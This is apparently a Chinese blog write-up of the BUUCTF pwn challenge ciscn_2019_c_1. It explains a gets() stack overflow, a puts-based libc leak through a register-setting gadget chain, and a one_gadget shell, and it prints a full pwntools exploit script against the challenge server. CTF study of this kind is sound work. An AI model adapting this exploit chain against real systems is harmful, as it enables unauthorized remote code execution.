BUUCTF ciscn_2019_c_1 write up

最新推荐文章于 2024-05-03 23:27:39 发布
最新推荐文章于 2024-05-03 23:27:39 发布
阅读量4.8k 收藏 2
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/100572092
版权

分析:
程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中
在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密
1.如果是小写字母跟0xD异或
2.如果是大写字母跟0xE异或
3.如果是数字跟0xF异或

在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据

二进制文件中没有出现getshell和system之类的函数,所以要通过泄露libc地址来调用system或execve函数

麻烦的是这是64位程序,参数不放在栈上,而是放在寄存器中,所以可以利用loc_400C60 和 loc_400C76 两处的代码布置参数 和调用我们想调用的函数

要注意的是call指令 会进行寻址,所以r12 + rbx*8 不能直接为函数的地址,要设置为指向函数的指针
在这里插入图片描述
具体步骤:
1.先调用puts 泄露puts函数的地址,然后得到libc的基址
2.利用one_gadget工具得到execve的libc地址,再加上libc基址得到execve("/bin/sh“, rsp+0x50, environ)的地址
在这里插入图片描述
3.再次进行溢出用execve的地址覆盖ret的地址从而获得shell
EXP:

from pwn import *
import struct

context(os="linux", arch="amd64", log_level="debug")

debug = 1
d = 0

if debug == 0:
    p = process("./cc_1")
    if d == 1:
        context.terminal = ['tmux', 'splitw', '-h']
        gdb.attach(proc.pidof(p)[0], gdbscript="b main")
else:
    p = remote("pwn.buuoj.cn", 20115)

elf = ELF("./cc_1")
libc = ELF("x64_libc.so.6")

def Encrypt(content):
    p.sendline("1")
    p.recvuntil("Input your Plaintext to be encrypted")
    p.sendline(content)

def Exit():
    p.sendline("3")

start = 0x400790
got_puts = elf.got['puts']
plt_puts = elf.plt['puts']
encrypt = 0x4009A0
loc_c60 = 0x400C60
loc_c7A = 0x400C7A

offset = 0x50

payload = 'a'*(offset + 8) + p64(loc_c7A)
#           rbx,    rbp,    r12,              r13,      r14,   r15
payload += p64(0) + p64(1) + p64(got_puts) + p64(0) + p64(0) + p64(got_puts) + p64(loc_c60)
payload += p64(0) + p64(0)*6 + p64(encrypt)


def exchange(payload):  #对payload进行异或运算
    new_payload = list(payload)
    for i in range(len(payload)):
        c = ord(payload[i])
        if c <= 96 or c > 122:
            if c <=64 or c > 90:
                if c > 47 and c <= 57:
                    c ^=0xf
                    new_payload[i] = chr(c)
                    print "i-> " + str(i)
                else:
                    new_payload[i] = chr(c)
                    print "i-> " + str(i)
            else:
                c ^= 0xe
                new_payload[i] = chr(c)
                print "i-> " + str(i)
        else:
            c ^= 0xd
            new_payload[i] = chr(c)
            print "i-> " + str(i)
    return new_payload

print("payload-> " + str(len(payload)))

payload = ''.join(exchange(payload))
print("payload-> " + payload)

Encrypt(payload)

p.recvline()
p.recvline()
p.recvline()
leak = p.recvuntil('\n')[:-1]
leak += "\x00\x00"    #"Q"只能对8字节数据进行解包,所以进行填充
print("len-> " + str(len(leak)))
print("leak-> " + leak)
leak = struct.unpack("<Q", leak)[0]
print leak
print hex(leak)

binaddr = elf.bss() + 0x100
got_gets = elf.got['gets']
x_addr = 0x6020AC
one_gadget = 0xf02a4
libc_base = leak - libc.symbols['puts']
print("libc_base-> " + hex(libc_base))

execve = libc_base + 0x4526a
print("execve-> " + hex(execve))

payload = 'a'*(offset + 8) + p64(execve)
print("payload-> " + payload)

p.recvuntil("Input your Plaintext to be encrypted")
p.sendline(payload)

p.interactive()

这个EXP有的时候打不到,可能因为有的时候one_gadget的约束条件没有达成

结果:
在这里插入图片描述

苍崎青子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PICOCTF_2019:picoCTF2019解决方案
02-18
【标签】:“binary-exploitation write-up picoctf-2019 C” 这些标签揭示了压缩包中的主要内容和技术方向。"binary-exploitation"表明了解题过程中涉及了二进制漏洞利用,这是CTF比赛中常见的一类挑战,通常需要...
LCD_YeJing.zip_1_Write On_wave3ak
09-23
Based on the VHDL LCD code, you can download it yourself if you need it. If the file cannot be opened, please write to me!
ciscn_2019_s_4 [write up]
m0_73756460的博客
01-14 215
buuctf刷题 ciscn_2019_s_4 【write up】
ciscn_2019_c_1[BUUCTF]
最新发布
moonlightsunshin的博客
05-03 560
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
BUUCTFciscn_2019_ne_5 Write Up
古月浪子的博客
08-06 845
题目是一道32位程序,依旧是rop 仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节 程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='i386' context.log_level='deb...
BUUCTFciscn_2019_n_5 Write Up
古月浪子的博客
08-06 470
这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上 什么保护都没开,我们发现可以直接执行bss段上的代码 思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell 注意栈帧大小 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64'.
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 345
【buu刷题】ciscn_2019_final_3 write up
ciscn_2019_final_2【write up】
m0_73756460的博客
04-12 105
BUUCTF刷题ciscn_2019_final_2【write up】
buuctf--pwn小结1test_your_nc
Xor0ne
06-14 2206
参考链接: 1、BUUCTF刷题(持续更新) 2、BUUCTF-PWN刷题日记 0x01 test_your_nc 参考链接:https://blog.csdn.net/qq_42404383/article/details/103625124 (1)、思路:看名字,然后直接用nc nc的全名是netcat,其主要用途是建立和监听任意TCP和UDP连接,支持ipv4和ipv6。因此,它可以用来网络调试、端口扫描等等。 nc [-hlnruz][-g<网关...>][-G<指向器数目&
【web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1962
ctf_BUUCTF_web
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 793
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
BUUCTF前六题
Greic的博客
12-24 2193
test_your_nc emmmmm,第一题没啥好说的,nc后直接便有了程序的控制权,cat flag即可得到flag: 所以flag为:flag{92968833-30fe-47d1-8d28-d398ce58d681} rip 老样子,检查保护机制: linux下64位程序只开了NX(栈不可执行),先拖进ida看看: 很容易看出来,溢出点为gets函数,此外,易得fun函数处有系统级函数: 则即可通过gets函数的溢出,在主函数结束后执行fun函数,然后获得程序的控制权,随之得到flag,exp
fk.rar_fk_visual c_write block
09-14
【标题】"fk.rar_fk_visual c_write block" 暗示了这是一个与编程相关的压缩文件,其中包含了使用Visual C++编写的关于“write block”功能的源代码。"Write block"通常指的是在程序中用于控制数据写入的一种技术,...
ply_write.rar_ply_write
09-20
本文将深入探讨如何使用MATLAB编写一个名为`ply_write.m`的函数,以实现PLY3D数据的写入功能。 首先,了解PLY文件的基本结构是至关重要的。PLY文件分为ASCII和二进制两种形式,其中ASCII格式易于阅读和调试,但数据...
GPIO.RAR_GPIO write_gpio read 22
09-21
在压缩包内的文件“gpio.c”很可能是实现这些功能的C语言源代码。代码中可能包含了配置GPIO、写入GPIO22以及读取GPIO22的函数。分析这个源代码,我们可以更深入地理解GPIO操作的具体实现细节,包括如何设置GPIO...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3012
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1766
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
2019 红帽杯 three 经验总结
qq_43189757的博客
11-11 1379
这题感觉要对汇编语言要比较熟悉会更容易做出来… 程序逻辑分析: 前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中 在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag 利用思路: 通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面...
i2c_smbus_write_byte_data
05-04
i2c_smbus_write_byte_data()是Linux下I2C通信的一个函数,用于向I2C设备中指定的寄存器地址写入一个字节的数据。它的函数原型如下: ``` __s32 i2c_smbus_write_byte_data(struct i2c_client *client, __u8 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值